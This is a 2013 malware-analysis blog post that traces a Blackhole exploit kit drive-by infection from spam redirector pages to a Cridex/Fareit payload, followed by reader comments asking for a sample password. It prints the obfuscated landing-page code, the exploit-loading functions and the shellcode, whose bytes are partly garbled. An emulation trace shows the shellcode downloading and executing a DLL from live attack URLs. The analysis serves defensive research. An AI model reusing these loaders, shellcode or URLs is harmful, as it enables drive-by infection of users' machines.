A Guide to flush infectors & payload at BHEK Infection on dekamerionka.ru:8080

Infection of Cridex Trojan dropping Fareit Credential Stealer 2013 Jan 14th

Virus Total:
[Payload] [Landing Page] [SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]

Exploit Infector Code Screenshot Pictures:
[SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]

Sample Download--->>[MEDIAFIRE]

Guide & Log: (I'm sorry for using plain text as the report.. lack of time)
=======================================================
#MalwareMustDie - Infection of Blackhole EK via Spam 
Landing page: dekamerionka.ru:8080
IP: 81.31.47.124, 91.224.135.20, 212.112.207.15
A guide to flush the Blackhole Payload & Infectors...
@unixfreaxjp /malware]$ date
Tue Jan 15 23:05:49 JST 2013
=======================================================

Infector urls...

h00p://ideawiz.org/letter.htm 
h00p://threesaints.org.uk/letter.htm 
h00p://masreptiles.terrarium.pl/letter.htm 

// All of the dirty stuff's download URLs (as resolved from the landing page):

PD-079  : h00p://dekamerionka.ru:8080/forum/links/column.php
jar     : h00p://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
payload : h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
swf1    : h00p://dekamerionka.ru:8080/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
swf2    : h00p://dekamerionka.ru:8080/forum/links/column.php?jkmflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp
pdf1    : h00p://dekamerionka.ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
pdf2    : h00p://dekamerionka.ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f

//infector page access...

--20:26:45--  h00p://threesaints.org.uk/letter.htm
           => `letter.htm'
Resolving threesaints.org.uk... seconds 0.00, 173.254.28.107
Caching threesaints.org.uk => 173.254.28.107
Connecting to threesaints.org.uk|173.254.28.107|:80... seconds 0.00, connected.
  :
GET /letter.htm HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: threesaints.org.uk
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Tue, 15 Jan 2013 11:26:45 GMT
Server: Apache
Last-Modified: Tue, 15 Jan 2013 11:14:17 GMT
ETag: "4f03efb-1a9-4d351dcda592d"
Accept-Ranges: bytes
Content-Length: 425
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
  :
200 OK
Length: 425 [text/html]
20:26:47 (11.89 MB/s) - `letter.htm' saved [425/425]


// which contained this code...

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>  
<h2><b>Please wait a moment ...  You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>

<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://dekamerionka.ru:8080/forum/links/column.php";}
</script>

</body>
</html>

-----------------------------------------------------------

// which forwards you to the landing page of BHEK....

--20:28:05--  h00p://dekamerionka.ru:8080/forum/links/column.php
           => `column.php'
Resolving dekamerionka.ru... seconds 0.00, 81.31.47.124, 91.224.135.20, 212.112.207.15
Caching dekamerionka.ru => 81.31.47.124 91.224.135.20 212.112.207.15
Connecting to dekamerionka.ru|81.31.47.124|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 11:28:04 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
  :
200 OK
Length: unspecified [text/html]
20:28:07 (69.85 KB/s) - `column.php' saved [117566]
A new BHEK landing page obfuscation.. the first time I've seen this one:
<html><head><title></title></head><body>
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&y..
<param name="val" value="Dyy3OjjMeqV0el8toqV..
<param value="" name="prime" 
<script>function c(){if(window.document)s+=String.fromCharCode(a..
var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:..
!6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!..
98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:6..
3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!0..
:48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:..
:!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!..
0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!..
      :
...73:!!0:!02:!!!:46:!06:97:!!4:34:4!:59";


a=a.replace(/!/g,1)[sp](":");
for(i=0,s="";i<a.length;i++){
 c();
}
z=true;
try{document.createElement("span");}catch(q){z=false;}
if(window.document)if(z)e(s);
  </script></body></html>
Landing page structure:
   :
// applet
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe">
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" />
</applet>

   :

// first script
 function c()
 {
   if(window.document)s+=String.fromCharCode(a[i]);
 }
 e=eval;
 sp="split";
 

// soon followed by second script+obfuscation data:
var a = "!!8:97:!!4:32:80:!08:!!.....:97:!!4:34:4!:59";

// generator..
 a=a.replace(/!/g,1)[sp](":");
 for(i=0,s="";i<a.length;i++)
 {
   c();
 }
 z=true;
 try
 {
   document.createElement("span");
 }
 catch(q)
 {
   z=false;
 }
 if(window.document)if(z)e(s);
The summary of the infection method used in this landing page:
// From this landing page we will get infections as follows:

1. The HTML landing page applet will infect you with -

// - the first infection, a JAR (the 0day Java JAR is served here..)
    <applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe">
    <param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
    <param value="" name="prime" /></applet>

2. The obfuscated landing page script will infect you with:

// the flash/swf SWF1 exploit.....
   function getCN()
   { return "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + 
     "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }

// pdf1
   function p1(){
   var d = document.createElement("object");
   d.setAttribute("data", "/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x(  "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + x(pdfver.join(".")));
   d.setAttribute("type", "application/pdf");
   document.body.appendChild(d);}

// pdf2
   function p2(){
   var d = document.createElement("object");
   d.setAttribute("data", "/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x(  "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + x(pdfver.join(".")));
   d.setAttribute("type", "application/pdf");
   document.body.appendChild(d);
}

// flash/swf SWF2 exploit....
   function ff2(){
   var oSpan = document.createElement("span");
   var url = "/forum/links/column.php?jkmflr=" + x("c833f") + "&boqrjhrc=" + x("nyjy") +   "&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp";
   oSpan.innerHTML = "
    <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>
    <param name='movie' value='" + url + "' />
    <param name='allowScriptAccess' value='always' />
    <param name='Play' value='0' />
    <embed src='" + url + "' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'>
    </embed></object>
    ";
    document.body.appendChild(oSpan);  }

// a shellcode (to be called by the other exploits as the key to the payload)
   function getShellCode(){
   var a = "8200!%4482!%e551!%e034!%5164!%f474!...!%1414!%".split("").
   reverse().join("");
   return a["replace"](/\%!/g, "%" + "u")  }

// and a jar component to detect your java version
   $$["onDetec" + "tionDone"]("Ja" + "va", svwrbew6436b, "../data/getJavaInfo.jar");
Shellcode & Payload:
// change the code to the below & see the unpacked shellcode:

var a = "8200!%4482!...!%1414!%".split("").reverse().join("");
var xxx=a["replace"](/\%!/g, "%" + "u");
document.write(xxx);

// output: the unpacked shellcode as a %u-escaped unicode string:


--------------------------------------------------------------------------------
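Both unpacking tricks shown above (the "!"-for-"1" char-code list that the first script builds into s and hands to eval, and the reversed "!%" string inside getShellCode()) can be undone offline without running any of the kit's code. The following is an added example, not code from the post or the kit; the function names are mine and the sample inputs are constructed from the fragments visible in the post. It also converts the %u string into the little-endian bytes it occupies in memory, which is the form an emulator needs.

```javascript
// Added example (not from the original post): undo the two string-unpacking
// layers of this landing page offline, without eval().
//
// Layer 1: the first script keeps the real script as ":"-separated decimal
// char codes with every digit "1" written as "!", then does
//   a.replace(/!/g,1).split(":") -> String.fromCharCode(a[i]) -> eval(s)
// Layer 2: getShellCode() keeps the shellcode string reversed, with "%u"
// written as "!%", and restores it at run time.

// Layer 1: return the decoded script text instead of eval()-ing it.
function decodeCharCodeScript(a) {
  return a.replace(/!/g, "1")
    .split(":")
    .map(function (n) { return String.fromCharCode(parseInt(n, 10)); })
    .join("");
}

// Layer 2: un-reverse the stored string and restore the "%u" escapes,
// the same transform getShellCode() applies, as a pure function.
function unpackShellcodeString(stored) {
  var reversed = stored.split("").reverse().join("");
  return reversed.replace(/%!/g, "%u");
}

// Turn "%uXXXX%uYYYY..." into the bytes the string occupies in memory.
// Each %uXXXX is one UTF-16 code unit stored little-endian, so %u8366
// becomes the bytes 66 83. This is the byte order to hand to libemu.
function shellcodeStringToBytes(s) {
  var words = s.match(/%u[0-9a-fA-F]{4}/g) || [];
  var out = [];
  words.forEach(function (w) {
    var v = parseInt(w.slice(2), 16);
    out.push(v & 0xff);        // low byte first
    out.push((v >> 8) & 0xff); // high byte second
  });
  return out;
}

function toHex(bytes) {
  return bytes.map(function (b) { return ("0" + b.toString(16)).slice(-2); }).join(" ");
}

// Constructed sample inputs: the first 15 char codes of the landing page's
// "a" string as printed in the post, and a stored string built so that it
// unpacks to the first three %u words of the shellcode (%u4141%u4141%u8366).
var SAMPLE_CHARCODES = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99";
var SAMPLE_STORED_SHELLCODE = "6638!%1414!%1414!%";

console.log(decodeCharCodeScript(SAMPLE_CHARCODES));    // var PluginDetec
var unpacked = unpackShellcodeString(SAMPLE_STORED_SHELLCODE);
console.log(unpacked);                                   // %u4141%u4141%u8366
console.log(toHex(shellcodeStringToBytes(unpacked)));    // 41 41 41 41 66 83
```

The decoded prefix "var PluginDetec" shows the landing page starts by loading the PluginDetect library, which is what the later pdfver and Java checks rely on.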


// #Tips: if you want to use libemu to crack this, I made the below format for you..

import pylibemu
 
shellcode  = b"\x41\x41\x41\x41\x83\x66\xfc\xe4\xeb\xfc\x58\x1O\xc9\x31\x81\x66\xO9\xe9\x8O\xfe\x28\x3O\xe2\x4O\xeb\xfa\xe8\xO5\xff\xeb"
shellcode += b"\xff\xff\xcc\xad\x1c\x5d\x77\xc1\xe8\x1b\xa3\x4c\x18\x68\x68\xa3\xa3\x24\x34\x58\xa3\x7e\x2O\x5e\xf3\x1b\xa3\x4e\x14\x76"
shellcode += b"\x5c\x2b\xO4\x1b\xc6\xa9\x38\x3d\xd7\xd7\xa3\x9O\x18\x68\x6e\xeb\x2e\x11\xd3\x5d\x1c\xaf\xad\xOc\x5d\xcc\xc1\x79\x64\xc3"
shellcode += b"\x7e\x79\x5d\xa3\xa3\x14\x1d\x5c\x2b\x5O\x7e\xdd\x5e\xa3\x2b\xO8\x1b\xdd\x61\xe1\xd4\x69\x2b\x85\x1b\xed\x27\xf3\x38\x96"
shellcode += b"\xda\x1O\x2O\x5c\xe3\xe9\x2b\x25\x68\xf2\xd9\xc3\x37\x13\xce\x5d\xa3\x76\xOc\x76\xf5\x2b\xa3\x4e\x63\x24\x6e\xa5\xd7\xc4"
shellcode += b"\xOc\x7c\xa3\x24\x2b\xfO\xa3\xf5\xa3\x2c\xed\x2b\x76\x83\xeb\x71\x7b\xc3\xa3\x85\xO8\x4O\x55\xa8\x1b\x24\x2b\x5c\xc3\xbe"
shellcode += b"\xa3\xdb\x2O\x4O\xdf\xa3\x2d\x42\xcO\x71\xd7\xbO\xd7\xd7\xd1\xca\x28\xcO\x28\x28\x7O\x28\x42\x78\x4O\x68\x28\xd7\x28\x28"
shellcode += b"\xab\x78\x31\xe8\x7d\x78\xc4\xa3\x76\xa3\xab\x38\x2d\xeb\xcb\xd7\x47\x4O\x28\x46\x4O\x28\x5a\x5d\x45\x44\xd7\x7c\xab\x3e"
shellcode += b"\x2O\xec\xcO\xa3\x49\xcO\xd7\xd7\xc3\xd7\xc3\x2a\xa9\x5a\x2c\xc4\x28\x29\xa5\x28\xOc\x74\xef\x24\xOc\x2c\x4d\x5a\x5b\x4f"
shellcode += b"\x6c\xef\x2c\xOc\x5a\x5e\x1a\x1b\x6c\xef\x2O\xOc\xO5\xO8\xO8\x5b\x4O\x7b\x28\xdO\x28\x28\x7e\xd7\xa3\x24\x1b\xcO\x79\xe1"
shellcode += b"\x6c\xef\x28\x35\x58\x5f\x5c\x4a\x6c\xef\x2d\x35\x4c\xO6\x44\x44\x6c\xee\x21\x35\x71\x28\xe9\xa2\x18\x2c\x6c\xaO\x2c\x35"
shellcode += b"\x79\x69\x28\x42\x28\x42\x7f\x7b\x28\x42\x7e\xd7\xad\x3c\x5d\xe8\x42\x3e\x7b\x28\x7e\xd7\x42\x2c\xab\x28\x24\xc3\xd7\x7b"
shellcode += b"\x2c\x7e\xeb\xab\xc3\x24\xc3\x2a\x6f\x3b\x17\xa8\x5d\x28\x6f\xd2\x17\xa8\x5d\x28\x42\xec\x42\x28\xd7\xd6\x2O\x7e\xb4\xcO"
shellcode += b"\xd7\xd6\xa6\xd7\x26\x66\xbO\xc4\xa2\xd6\xa1\x26\x29\x47\x1b\x95\xa2\xe2\x33\x73\x6e\xee\x1e\x51\xO7\x32\x4O\x58\x5c\x5c"
shellcode += b"\x12\x58\xO7\xO7\x4d\x4c\x49\x43\x4d\x45\x41\x5a\x46\x47\x49\x43\x5a\xO6\x12\x5d\x18\x1O\x18\x1O\x4e\xO7\x5a\x47\x45\x5d"
shellcode += b"\x44\xO7\x46\x41\x5b\x43\x4b\xO7\x44\x47\x45\x5d\xO6\x46\x4O\x58\x17\x58\x4e\x4f\x1b\x15\x12\x18\x46\x19\x19\x12\x12\x41"
shellcode += b"\x41\x19\x1b\x12\xOe\x1b\x4d\x47\x1a\x15\x12\x5e\x43\x19\x19\x12\x12\x45\x1a\x1b\x1b\x12\x12\x1b\x43\x19\x19\x12\x12\x43"
shellcode += b"\x19\x1b\x19\x12\x12\x42\x47\x19\x49\xOe\x19\x15\xOe\x43\x47\x4f\x46\x15\x43\xOe\x15\x5e\x28\x44\xOO\x28"
 
emulator = pylibemu.Emulator()
offset = emulator.shellcode_getpc_test(shellcode)   # find a plausible entry offset
print(offset)

emulator.prepare(shellcode, offset)
emulator.test()
print(emulator.emu_profile_output)                  # the API-call trace shown below
----------------------------------------------------------------------------
// my way is...
// save the binary and disassemble it..
----------------------------------------------------------------------------


-------------------------------------------------------------------

// see the payload url below in the urlmon.URLDownloadToFileA call at 0x1a494bbe ↓

0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)

// payload is here..
h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l

// download...

--21:33:38--  h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
           => `column.php@gf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&a=1k&go=n&kv=l
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Caching dekamerionka.ru => 212.112.207.15 81.31.47.124 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  : 
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:33:36 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 15 Jan 2013 12:33:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename=calc.exe
Content-Transfer-Encoding: binary
Content-Length: 140288
200 OK
Length: 140,288 (137K) [application/x-msdownload]
100%[====================================>] 140,288       64.83K/s
21:33:42 (64.73 KB/s) - `calc.exe' saved [140288/140288]
Getting infector components
    :
// let's get the SWF1...
// I prefer to check the obfuscated link in the function below:

function getCN(){
  return "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + 
  "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }

// it uses the function x, so let's reuse it to compute the obfuscated values in the url string..

function x(s){
  d = [];
  for (i = 0; i < s.length; i++){
    k = (s.charCodeAt(i)).toString(33);   // each char code written in base 33
    d.push(k);
  }
  return d.join(":");
}
var xxx= "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy";
document.write(xxx);

// result:
/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy

//download it...
h00p://dekamerionka.ru:8080/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
GET /forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
Connection: Keep-Alive
   :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:50:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 7238
200 OK
Registered socket 1896 for persistent reuse.
Length: 7,238 (7.1K) [text/html]
100%[====================================>] 7,238         22.73K/s

// Get the SWF2 Infector,..

// same method...
h00p://dekamerionka.ru:8080/forum/links/column.php?jkmflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp

HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:51:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 946
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 946 [text/html]
100%[====================================>] 946           --.--K/s
21:51:14 (26.47 MB/s) - "column.php@jkmflr=30%3A1n%3A1i%3A1i%3A33&boqrjhrc=3b%3A3m%3A37%3A3m&rshcr=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jfwxwr=gcp" saved [946/946]


// Get the PDF 1 & 2 infectors..., knowing that x(pdfver.join(".")) = "1k:1d:1f:1d:1g:1d:1f"

/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x(  "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + "1k:1d:1f:1d:1g:1d:1f"
/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x(  "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + "1k:1d:1f:1d:1g:1d:1f"
   ↓
h00p://dekamerionka.ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
h00p://dekamerionka.ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f

// shortly, the download logs..

     :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:17 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 21575
ETag: "18f8a6bcd64232c6eeead1d0a2c5cd62"
Last-Modified: Tue, 15 Jan 2013 13:05:17 GMT
Accept-Ranges: bytes
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,575 (21K) [application/pdf]
100%[====================================>] 21,575        40.09K/s
   :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:58 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 9781
Content-Disposition: inline; filename=b76cb.pdf
200 OK
Registered socket 1896 for persistent reuse.
Length: 9,781 (9.6K) [application/pdf]
100%[====================================>] 9,781         59.75K/s


// And the JAR...

// see the applet url...
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe">
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" /></applet>

http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:32:09 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 20 [text/html]
100%[====================================>] 20            --.--K/s
22:27:08 (659.56 KB/s) - `column.php@cabimab=lij&ymwbck=rpe.2' saved [20/20]

// hmm.. the jar download looks to have failed.. :-( Let's re-set the "request":


// retry - try1 (old java version)

--16:24:19--  http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
           => "column.php@cabimab=lij&ymwbck=rpe"
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Caching dekamerionka.ru => 212.112.207.15 81.31.47.124 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 07:24:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 16786
ETag: "e3ffc7e6bc6f654d51dd5bb7658ae853"
Last-Modified: Wed, 16 Jan 2013 07:24:16 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 16,786 (16K) [application/java-archive]
16:24:21 (26.42 KB/s) - `try1.jar' saved [16786/16786]

// retry - try2 (newer java version)

--17:06:01--  http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
           => "column.php@cabimab=lij&ymwbck=rpe"
Resolving dekamerionka.ru... seconds 0.00, 91.224.135.20, 212.112.207.15, 81.31.47.124
Caching dekamerionka.ru => 91.224.135.20 212.112.207.15 81.31.47.124
Connecting to dekamerionka.ru|91.224.135.20|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5b20 (new refcount 1).
  :
GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 08:11:06 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 22600
ETag: "2af29d21c006b5c106bd7760f19a2bf5"
Last-Modified: Wed, 16 Jan 2013 08:05:58 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 22,600 (22K) [application/java-archive]
17:06:03 (42.76 KB/s) - `try2.jar' saved [22600/22600]

// two jars were downloaded successfully

bash-2.02$ date
Tue Jan 15 23:14:51  2013

2013/01/16  16:24            16,786 tri1.jar
2013/01/16  17:05            22,600 try2.jar
               2 File(s)         39,386 bytes

tri1.jar    e3ffc7e6bc6f654d51dd5bb7658ae853
try2.jar    2af29d21c006b5c106bd7760f19a2bf5
 :
#MalwareMustDie!

10 comments:

  1. Hi. What is the password for the archive?

  2. we will send the password by email

     Reply:
     1. Hi. What is the password for the archive? Please email fahmifisal@gmail.com

  3. Hi, what is the password?

     sav1980 @ hotmail.it

  4. Hi, what is the password?

     yeoungpc@gmail.com

     thanks~

  5. hi and thanks for the great work. Do you have any script to convert and analyze the shell code? thanks

     tecko92@gmail.com

  6. Hi guys and thanks for the great analysis. Do you have any scripts to deobfuscate the payload?

  7. We discipline ourselves not to use tools for these analyses.
     Do not get us wrong, we are not against any tools; we help to improve tools for automatic deobfuscation by publishing our manual posts.

     You can use many great online obfuscation tools for these scripts like jsunpack or wepawet. Please try also to deobfuscate manually too since the encoded data are changing rapidly.

     Rgds

  8. Hi, can you send the password?

     millky8202@gmail.com

     thanks~